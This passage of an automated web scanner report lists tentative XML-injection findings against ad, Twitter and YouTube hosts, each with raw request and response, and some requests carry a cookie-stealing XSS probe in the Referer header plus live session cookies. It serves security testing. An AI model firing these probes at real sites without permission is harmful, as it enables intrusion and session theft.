GET /log.php]]>>?scd=hkgjUR3DHjkvLQRs%2FEuccDn5SM8Xi1TGsoahODUhoB8%3D&adids=30619,27469,30637&r=1315103145 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 02:43:14 GMT
Server: lighttpd/1.4.21

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.42. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /api]]>>/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 04 Sep 2011 03:08:23 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.43. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /api/segments.json]]>>?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 04 Sep 2011 03:08:24 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.44. http://pixel.quantserve.com/optout_set [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optout_set]]>>?s=nai&nocache=0.6965706 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 04 Sep 2011 11:15:20 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.45. http://pixel.quantserve.com/optout_status [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_status

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optout_status]]>>?s=nai&nocache=0.5164657 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 04 Sep 2011 11:03:03 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.46. http://pixel.quantserve.com/optout_verify [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_verify

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /optout_verify]]>>?s=nai&nocache=0.6965706 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=EC4BHQHQB7vRC74Rggi_ELqlAA

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sun, 04 Sep 2011 11:23:08 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.47. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/f.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/f.gif?_=1315103177373&align=&button=blue&id=twitter_tweet_button_0&lang=en&link_color=&screen_name=timesofindia&show_count=false&show_screen_name=&text_color=&twttr_variant=1.1&twttr_referrer=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/follow_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:34:00 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/images/f.gif</Key><RequestId>642BC32DE010DF5C</RequestId>
...[SNIP]...

10.48. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/f.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/f.gif?_=1315103177373&align=&button=blue&id=twitter_tweet_button_0&lang=en&link_color=&screen_name=timesofindia&show_count=false&show_screen_name=&text_color=&twttr_variant=1.1&twttr_referrer=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/follow_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:34:03 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images]]&gt;&gt;/f.gif</Key><RequestId>777A26175D4992F7</RequestId>
...[SNIP]...

10.49. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/f.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/f.gif]]>>?_=1315103177373&align=&button=blue&id=twitter_tweet_button_0&lang=en&link_color=&screen_name=timesofindia&show_count=false&show_screen_name=&text_color=&twttr_variant=1.1&twttr_referrer=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/follow_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:34:06 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images/f.gif]]&gt;&gt;</Key><RequestId>6C01EFC4EA582148</RequestId>
...[SNIP]...

10.50. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1315103187519&count=horizontal&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&text=48%20hours%20on%2C%20Mumbai%20airport's%20main%20runway%20still%20shut&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&via=ndtv&twttr_referrer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:42:04 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/images/t.gif</Key><RequestId>60AADBF5755E622A</RequestId>
...[SNIP]...

10.51. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1315103187519&count=horizontal&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&text=48%20hours%20on%2C%20Mumbai%20airport's%20main%20runway%20still%20shut&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&via=ndtv&twttr_referrer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:42:07 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images]]&gt;&gt;/t.gif</Key><RequestId>2890BE832FF00566</RequestId>
...[SNIP]...

10.52. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1315103187519&count=horizontal&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&text=48%20hours%20on%2C%20Mumbai%20airport's%20main%20runway%20still%20shut&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&via=ndtv&twttr_referrer=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:42:09 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images/t.gif]]&gt;&gt;</Key><RequestId>762C342A4DB86623</RequestId>
...[SNIP]...

10.53. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html HTTP/1.1
Host: platform.twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: guest_id=v1%3A131220472331773196; __utma=43838368.1381732871.1312402661.1312402661.1313158153.2; __utmz=43838368.1313158153.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=50.23.123.106.1315057356690299

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:54:36 GMT
Content-Length: 294
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>ADD0D601E7017065</Reque
...[SNIP]...

10.54. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>> HTTP/1.1
Host: platform.twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cookie: guest_id=v1%3A131220472331773196; __utma=43838368.1381732871.1312402661.1312402661.1313158153.2; __utmz=43838368.1313158153.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=50.23.123.106.1315057356690299

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:54:38 GMT
Content-Length: 294
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>54A95271A65E74F3</Reque
...[SNIP]...

10.55. http://req.tidaltv.com/tpas1.aspx [xf parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://req.tidaltv.com
Path:   /tpas1.aspx

Issue detail

The xf parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the xf parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tpas1.aspx?mt=1&pid=852&xf=12]]>>&rand=1315103261 HTTP/1.1
Host: req.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Sun, 04 Sep 2011 03:22:18 GMT
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Server: Microsoft-IIS/6.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 163
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?><VideoAdServingTemplate xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" />

10.56. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflNVWyCR.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/swfbin]]>>/cps-vflNVWyCR.swf HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 11:10:20 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.57. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflNVWyCR.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/swfbin/cps-vflNVWyCR.swf]]>> HTTP/1.1
Host: s.ytimg.com
